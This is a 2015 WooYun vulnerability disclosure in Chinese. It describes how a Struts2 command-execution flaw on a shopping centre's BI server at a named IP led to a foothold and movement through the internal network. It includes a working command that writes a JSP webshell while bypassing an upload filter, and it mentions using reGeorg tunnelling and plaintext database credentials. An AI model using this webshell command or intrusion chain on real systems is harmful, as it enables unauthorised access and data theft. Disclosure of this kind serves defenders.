当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136648

漏洞标题:金鹰国际购物中心某服务器getshell导致可内网漫游

相关厂商:金鹰国际购物中心

漏洞作者: 纳米翡翠

提交时间:2015-08-24 22:02

修复时间:2015-10-08 22:04

公开时间:2015-10-08 22:04

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

金鹰国际购物中心某服务器getshell导致可内网漫游

详细说明:

1.从主站入手,拿基本信息

QQ截图20150824173718.jpg


QQ截图20150824174938.jpg


QQ截图20150824174911.jpg


2.通过对以上几个系统的访问,发现端口是9090的BI系统存在struts2漏洞

QQ截图20150824201439.jpg


登录处post到http://222.190.116.172:9090/biplatform/sysLoginVerif.action

QQ截图20150824193629.jpg


QQ截图20150824194420.jpg


3.本来到这里应该很简单,上传个木马直接getshell,但系统却对<>;等字符做了过滤,只要上传的文件里面包含<>;就会上传失败,shell也就无法写入
4.突破
经过无数次的尝试和对比,发现系统并没有任何类似安全狗的东西,而是网站本身对上传做了限制,经过测试发现该action无法上传<>等,但是在命令执行入却可以写入<>,如此就好办了,通过echo 写入文件,然后通过>重定向到其它目录
命令执行内容如下:

cmd /c echo ^<%(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%^> >  D:\tomcat7\webapps\ROOT\small.jsp


QQ截图20150824195454.jpg


小马的地址就是http://222.190.116.172:9090/small.jsp
然后再通过小马成功上传大马,http://222.190.116.172:9090/cmd.jsp

QQ截图20150824195737.jpg


接着上传reGeorg的jsp客户端,通过本地proxy代理到对方内网

QQ截图20150824200112.jpg


通过代码了解到本地的oracle数据库,通过navicat连接成功

QQ截图20150824200538.jpg


目测400多用户

QQ截图20150824200846.jpg


又看了一下另一个表,发现这个系统的一个牛逼的东西,那就是这个系统的用户名和密码竟然保存在数据库里面

QQ截图20150824201130.jpg


如此那就直接远程桌面了

QQ截图20150824162703.jpg


接下来就可以畅游内网啦

漏洞证明:

修复方案:

我再努力发现点东西,有新的发现再提交

版权声明:转载请注明来源 纳米翡翠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)